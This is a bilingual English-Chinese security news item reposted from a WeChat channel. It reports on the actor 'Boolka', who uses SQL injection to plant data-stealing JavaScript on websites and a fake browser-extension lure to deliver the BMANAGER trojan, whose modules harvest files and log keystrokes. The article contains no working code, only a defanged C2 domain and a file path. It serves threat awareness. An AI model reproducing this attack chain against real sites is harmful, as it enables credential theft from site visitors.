A previously undocumented threat actor dubbed Boolka has been observed compromising websites with malicious scripts to deliver a modular trojan codenamed BMANAGER.
一个以前未记录的威胁行为者,被称为Boolka,已经观察到使用恶意脚本来感染网站,以传递名为BMANAGER的模块化木马。
"The threat actor behind this campaign has been carrying out opportunistic SQL injection attacks against websites in various countries since at least 2022," Group-IB researchers Rustam Mirkasymov and Martijn van den Berk said in a report published last week.
"自2022年以来,这次活动背后的威胁行为者一直利用机会进行SQL注入攻击,针对各个国家的网站。" Group-IB的研究人员Rustam Mirkasymov和Martijn van den Berk在上周发表的报告中说。
"Over the last three years, the threat actors have been infecting vulnerable websites with malicious JavaScript scripts capable of intercepting any data entered on an infected website."
"在过去的三年里,威胁行为者一直在感染易受攻击的网站上插入恶意JavaScript脚本,这些脚本能够截取在感染网站上输入的任何数据。"
Boolka gets its name from the JavaScript code inserted into the website that beacons out to a command-and-control server named "boolka[.]tk" every time an unsuspecting visitor lands on the infected site.
Boolka的名字来源于插入到网站中的JavaScript代码,每当一个毫无戒心的访客登陆到感染的网站上时,该代码就会向一个名为"boolka[.]tk"的命令与控制服务器发送信标。
The JavaScript is also designed to collect and exfiltrate user inputs and interactions in a Base64-encoded format, indicating the use of the malware to grab sensitive details like credentials and other personal information.
该JavaScript还设计用于收集和外发用户输入和交互的Base64编码格式,表明该恶意软件用于获取敏感详细信息,如凭据和其他个人信息。
Furthermore, it redirects users to a bogus loading page that prompts victims to download and install a browser extension when, in reality, it drops a downloader for the BMANAGER trojan, which, in turn, attempts to fetch the malware from a hard-coded URL. The malware delivery framework is based on the BeEF framework.
此外,当用户登陆到感染网站时,它会将用户重定向到一个虚假的加载页面,提示受害者下载并安装一个浏览器扩展程序,而实际上它会释放一个BMANAGER木马的下载器,该木马又尝试从一个硬编码的URL获取恶意软件。恶意软件传送框架基于BeEF框架。
The trojan, for its part, serves as a conduit to deploy four additional modules, including BMBACKUP (harvest files from particular paths), BMHOOK (record which applications are running and have keyboard focus), BMLOG (log keystrokes), and BMREADER (export stolen data). It also sets up persistence on the host using scheduled tasks.
至于木马本身,它作为一个通道来部署四个附加模块,包括BMBACKUP(从特定路径中收集文件),BMHOOK(记录运行哪些应用程序并具有键盘焦点),BMLOG(记录按键)和BMREADER(导出窃取的数据)。它还使用计划任务在主机上建立持久性。
"Most samples make use of a local SQL database," the researchers noted. "The path and name of this database is hard-coded in the samples to be located at: C:Users{user}AppDataLocalTempcoollog.db, with user being the username of the logged in user."
"大多数样本都使用本地SQL数据库," 研究人员指出。"这个数据库的路径和名称在样本中是硬编码的,位于:C:Users{user}AppDataLocalTempcoollog.db,其中user是已登录用户的用户名。"
Boolka is the third actor after GambleForce and ResumeLooters to leverage SQL injection attacks to steal sensitive data in recent months.
Boolka是继GambleForce和ResumeLooters之后,在最近几个月内利用SQL注入攻击窃取敏感数据的第三个行为者。
"Starting from opportunistic SQL injection attacks in 2022 to the development of his own malware delivery platform and trojans like BMANAGER, Boolka's operations demonstrate the group's tactics have grown more sophisticated over time," the researchers concluded.
"从2022年的机会性SQL注入攻击到开发自己的恶意软件传递平台和木马,如BMANAGER,Boolka的行动表明该组织的策略随着时间的推移变得更加复杂。" 研究人员总结道。
"The injection of malicious JavaScript snippets into vulnerable websites for data exfiltration, and then the use of the BeEF framework for malware delivery, reflects the step-by-step development of the attacker's competencies."
"向易受攻击的网站注入恶意JavaScript片段以进行数据外发,然后使用BeEF框架进行恶意软件传递,反映了攻击者能力的逐步发展。"
参考资料
[1]https://thehackernews.com/2024/06/new-cyberthreat-boolka-deploying.html
关注我们
欢迎来到我们的公众号!我们专注于全球网络安全和精选双语资讯,为您带来最新的资讯和深入的分析。在这里,您可以了解世界各地的网络安全事件,同时通过我们的双语新闻,获取更多的行业知识。感谢您选择关注我们,我们将继续努力,为您带来有价值的内容。
原文始发于微信公众号(知机安全):新的网络威胁'Boolka'通过SQLi攻击部署BMAMAGER木马
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论